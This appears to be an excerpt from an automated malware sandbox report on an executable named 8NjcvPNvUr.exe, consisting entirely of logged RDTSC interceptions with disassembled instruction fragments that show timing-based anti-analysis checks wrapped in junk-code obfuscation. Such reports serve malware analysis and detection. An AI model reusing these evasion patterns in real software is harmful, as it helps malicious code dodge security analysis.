Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 565F25 second address: 565F2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FD180B5C156h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 565F2F second address: 565F56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED558h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jno 00007FD1807ED546h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 56A125 second address: 56A12B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 56A20B second address: 56A215 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FD1807ED546h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 56A215 second address: 56A219 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 56A702 second address: 56A706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 56A706 second address: 56A71B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 56A71B second address: 56A720 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 56DC1D second address: 56DC8D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD180B5C171h 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b push esi 0x0000000c pop esi 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jp 00007FD180B5C198h 0x00000018 jno 00007FD180B5C172h 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 jmp 00007FD180B5C166h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C40108 second address: 4C40162 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD1807ED54Fh 0x00000009 adc ch, FFFFFFCEh 0x0000000c jmp 00007FD1807ED559h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 jmp 00007FD1807ED54Ch 0x0000001b xchg eax, ebp 0x0000001c pushad 0x0000001d push edi 0x0000001e mov edx, eax 0x00000020 pop ecx 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 jmp 00007FD1807ED54Bh 0x00000029 pop ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C40162 second address: 4C40169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C40169 second address: 4C40186 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD1807ED559h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C40186 second address: 4C4018A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C20F50 second address: 4C20F54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C20F54 second address: 4C20F71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C169h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C20F71 second address: 4C20F77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C20F77 second address: 4C20F7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C70112 second address: 4C701D4 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD1807ED54Ah 0x00000008 jmp 00007FD1807ED555h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 movzx eax, dx 0x00000013 popad 0x00000014 push eax 0x00000015 pushad 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FD1807ED556h 0x0000001d xor eax, 26B64928h 0x00000023 jmp 00007FD1807ED54Bh 0x00000028 popfd 0x00000029 pushfd 0x0000002a jmp 00007FD1807ED558h 0x0000002f or cx, 7B88h 0x00000034 jmp 00007FD1807ED54Bh 0x00000039 popfd 0x0000003a popad 0x0000003b movzx eax, di 0x0000003e popad 0x0000003f xchg eax, ebp 0x00000040 jmp 00007FD1807ED54Bh 0x00000045 mov ebp, esp 0x00000047 jmp 00007FD1807ED556h 0x0000004c pop ebp 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007FD1807ED557h 0x00000054 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C701D4 second address: 4C701EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD180B5C164h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C701EC second address: 4C701F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C000CB second address: 4C000DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C15Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C000DA second address: 4C000F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD1807ED554h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C000F2 second address: 4C0011B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C15Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD180B5C165h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C0011B second address: 4C001C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 799E8DE2h 0x00000008 jmp 00007FD1807ED553h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 push edi 0x00000013 mov bl, cl 0x00000015 pop edi 0x00000016 mov si, A953h 0x0000001a popad 0x0000001b xchg eax, ebp 0x0000001c jmp 00007FD1807ED556h 0x00000021 mov ebp, esp 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007FD1807ED54Eh 0x0000002a sub ah, 00000008h 0x0000002d jmp 00007FD1807ED54Bh 0x00000032 popfd 0x00000033 mov ebx, eax 0x00000035 popad 0x00000036 push dword ptr [ebp+04h] 0x00000039 jmp 00007FD1807ED552h 0x0000003e push dword ptr [ebp+0Ch] 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 pushfd 0x00000045 jmp 00007FD1807ED54Dh 0x0000004a sub si, 47D6h 0x0000004f jmp 00007FD1807ED551h 0x00000054 popfd 0x00000055 pushad 0x00000056 popad 0x00000057 popad 0x00000058 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C20C31 second address: 4C20C85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD180B5C167h 0x00000009 xor ax, C1DEh 0x0000000e jmp 00007FD180B5C169h 0x00000013 popfd 0x00000014 jmp 00007FD180B5C160h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C20C85 second address: 4C20CA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED559h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C20CA2 second address: 4C20CA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C20CA7 second address: 4C20CC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bl, 22h 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD1807ED552h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C2078A second address: 4C20843 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C169h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FD180B5C167h 0x00000011 adc ax, F5FEh 0x00000016 jmp 00007FD180B5C169h 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007FD180B5C160h 0x00000022 add si, 5CF8h 0x00000027 jmp 00007FD180B5C15Bh 0x0000002c popfd 0x0000002d popad 0x0000002e xchg eax, ebp 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007FD180B5C164h 0x00000036 and ax, B758h 0x0000003b jmp 00007FD180B5C15Bh 0x00000040 popfd 0x00000041 mov ebx, esi 0x00000043 popad 0x00000044 mov ebp, esp 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007FD180B5C161h 0x0000004d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C2070F second address: 4C20713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C20713 second address: 4C20717 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C20717 second address: 4C2071D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C2071D second address: 4C20723 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C20723 second address: 4C20727 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C20727 second address: 4C2073D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ecx, 0747C2EBh 0x00000011 mov ax, A2C7h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C204A3 second address: 4C204A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C204A9 second address: 4C204AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C204AD second address: 4C204B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C204B1 second address: 4C204E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov di, cx 0x0000000d mov si, CACFh 0x00000011 popad 0x00000012 xchg eax, ebp 0x00000013 jmp 00007FD180B5C162h 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f mov ax, dx 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C204E1 second address: 4C204F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 2354h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov bx, ax 0x00000011 mov eax, 52669397h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C204F8 second address: 4C204FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C204FE second address: 4C20502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C20502 second address: 4C20506 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C30227 second address: 4C30254 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED559h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD1807ED54Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C30254 second address: 4C302B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov si, di 0x0000000e mov edi, 29700ACEh 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 jmp 00007FD180B5C165h 0x0000001a mov ebp, esp 0x0000001c jmp 00007FD180B5C15Eh 0x00000021 pop ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FD180B5C167h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C70021 second address: 4C7008E instructions: 0x00000000 rdtsc 0x00000002 mov edi, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov cl, FCh 0x00000008 popad 0x00000009 push ebx 0x0000000a jmp 00007FD1807ED54Ch 0x0000000f mov dword ptr [esp], ebp 0x00000012 pushad 0x00000013 movzx esi, di 0x00000016 pushfd 0x00000017 jmp 00007FD1807ED553h 0x0000001c and al, 0000001Eh 0x0000001f jmp 00007FD1807ED559h 0x00000024 popfd 0x00000025 popad 0x00000026 mov ebp, esp 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FD1807ED558h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C7008E second address: 4C70092 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C70092 second address: 4C70098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C70098 second address: 4C700C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, ax 0x00000006 call 00007FD180B5C168h 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov cx, 60F9h 0x00000017 mov di, si 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C40392 second address: 4C403E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 mov dh, DEh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FD1807ED558h 0x00000012 add esi, 5C138878h 0x00000018 jmp 00007FD1807ED54Bh 0x0000001d popfd 0x0000001e mov ecx, 709093AFh 0x00000023 popad 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FD1807ED550h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C403E2 second address: 4C40431 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C15Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov edx, esi 0x0000000d call 00007FD180B5C160h 0x00000012 mov dl, al 0x00000014 pop edi 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 jmp 00007FD180B5C15Ah 0x0000001d mov eax, dword ptr [ebp+08h] 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FD180B5C167h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C40431 second address: 4C4046F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 pushfd 0x00000007 jmp 00007FD1807ED54Bh 0x0000000c add ecx, 5E5BE85Eh 0x00000012 jmp 00007FD1807ED559h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b and dword ptr [eax], 00000000h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C4046F second address: 4C40473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C40473 second address: 4C40479 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C40479 second address: 4C4047F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C4047F second address: 4C40483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C40483 second address: 4C40487 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C40487 second address: 4C404BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dword ptr [eax+04h], 00000000h 0x0000000c jmp 00007FD1807ED558h 0x00000011 pop ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FD1807ED54Ah 0x0000001b rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C404BA second address: 4C404BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C404BE second address: 4C404C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C20608 second address: 4C2067E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 mov bh, 37h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FD180B5C15Dh 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 mov cl, F1h 0x00000015 pushfd 0x00000016 jmp 00007FD180B5C169h 0x0000001b jmp 00007FD180B5C15Bh 0x00000020 popfd 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 jmp 00007FD180B5C166h 0x00000029 pop ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FD180B5C167h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C2067E second address: 4C20684 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C20684 second address: 4C20688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C606C5 second address: 4C606C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C606C9 second address: 4C606CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C606CF second address: 4C606D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C606D4 second address: 4C606FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FD180B5C160h 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD180B5C15Ah 0x00000017 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C606FB second address: 4C6070A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED54Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C6070A second address: 4C60722 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD180B5C164h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C60722 second address: 4C6075B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov esi, 65D86F6Fh 0x00000011 pushfd 0x00000012 jmp 00007FD1807ED554h 0x00000017 sbb ecx, 555AAF98h 0x0000001d jmp 00007FD1807ED54Bh 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C6075B second address: 4C60761 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C60761 second address: 4C60765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C60765 second address: 4C60795 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C15Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007FD180B5C166h 0x00000012 xchg eax, ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C60795 second address: 4C60799 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C60799 second address: 4C6079F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C6079F second address: 4C607BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED554h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C607BE second address: 4C607C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C607C2 second address: 4C607C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C607C6 second address: 4C607CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C607CC second address: 4C6081B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED54Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b jmp 00007FD1807ED554h 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FD1807ED550h 0x00000017 or ecx, 61135848h 0x0000001d jmp 00007FD1807ED54Bh 0x00000022 popfd 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
